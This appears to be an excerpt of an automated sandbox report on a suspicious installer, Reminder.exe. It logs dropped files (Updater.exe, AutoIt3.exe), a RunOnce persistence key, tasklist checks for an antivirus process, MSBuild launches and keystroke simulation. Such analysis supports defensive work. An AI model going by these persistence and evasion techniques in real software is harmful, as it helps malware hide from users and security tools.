                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: version.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: version.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpWindow found: window name: TMainFormJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Reminder.exeStatic file information: File size 5563800 > 1048576
                      Source: Reminder.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: wntdll.pdbUGP source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Updater.exe, 00000023.00000003.2236885625.0000000004988000.00000004.00001000.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2240329494.0000000004B28000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000003.2407786329.0000000004BD8000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000026.00000002.2412148142.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000002.2500332732.0000000004C18000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000002A.00000003.2497298647.0000000004A78000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: Reminder.tmp, 00000001.00000003.1684312693.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000001.00000003.1686108256.0000000002630000.00000004.00001000.00020000.00000000.sdmp, Reminder.tmp, 00000003.00000003.1726794198.0000000003170000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_006E310D
                      Source: Reminder.exeStatic PE information: real checksum: 0x5560c0 should be: 0x553d7f
                      Source: Reminder.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x343f79
                      Source: Reminder.tmp.2.drStatic PE information: real checksum: 0x0 should be: 0x343f79
                      Source: Reminder.exeStatic PE information: section name: .didata
                      Source: Reminder.tmp.0.drStatic PE information: section name: .didata
                      Source: Reminder.tmp.2.drStatic PE information: section name: .didata
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006F1046 push ecx; ret 35_2_006F1059
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B815D push 014B81A0h; ret 35_2_014B8198
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B815C push 014B81A0h; ret 35_2_014B8198
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B810D push 014B8139h; ret 35_2_014B8131
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B8105 push 014B8139h; ret 35_2_014B8131
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A236D push 014A23BEh; ret 35_2_014A23B6
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A4291 push ecx; mov dword ptr [esp], eax35_2_014A4292
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A25ED push 014A2619h; ret 35_2_014A2611
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B858D push 014B85D0h; ret 35_2_014B85C8
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B858C push 014B85D0h; ret 35_2_014B85C8
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A25B5 push 014A25E1h; ret 35_2_014A25D9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B2723 push 014B27D0h; ret 35_2_014B27C8
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B2725 push 014B27D0h; ret 35_2_014B27C8
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B27D5 push 014B2865h; ret 35_2_014B285D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B67FD push 014B6829h; ret 35_2_014B6821
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B67A5 push 014B67F1h; ret 35_2_014B67E9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B694B push 014B6979h; ret 35_2_014B6971
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B694D push 014B6979h; ret 35_2_014B6971
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B496D push 014B4999h; ret 35_2_014B4991
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B8971 push 014B899Dh; ret 35_2_014B8995
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B6985 push 014B69B1h; ret 35_2_014B69A9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B686D push 014B6899h; ret 35_2_014B6891
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A287D push 014A28A9h; ret 35_2_014A28A1
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B6835 push 014B6861h; ret 35_2_014B6859
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B68DD push 014B6909h; ret 35_2_014B6901
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B68A5 push 014B68D1h; ret 35_2_014B68C9
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014A28B6 push 014A2BB9h; ret 35_2_014A2BB1
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B4B69 push 014B4B95h; ret 35_2_014B4B8D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B4B31 push 014B4B5Dh; ret 35_2_014B4B55
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B4BDA push 014B4C25h; ret 35_2_014B4C1D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_014B4BF9 push 014B4C25h; ret 35_2_014B4C1D
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\Reminder.exeFile created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\friend\Updater.exe (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\Temp\is-BOC6S.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\friend\is-SBSAG.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\Temp\is-9EGBF.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeFile created: C:\edgheaa\AutoIt3.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Reminder.exeFile created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcdJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcdJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcdJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce fkccfcdJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00762558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,35_2_00762558
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E5D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,35_2_006E5D03
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00D02558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,38_2_00D02558
                      Source: C:\edgheaa\AutoIt3.exeCode function: 38_2_00C85D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,38_2_00C85D03
                      Source: C:\Users\user\Desktop\Reminder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Reminder.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
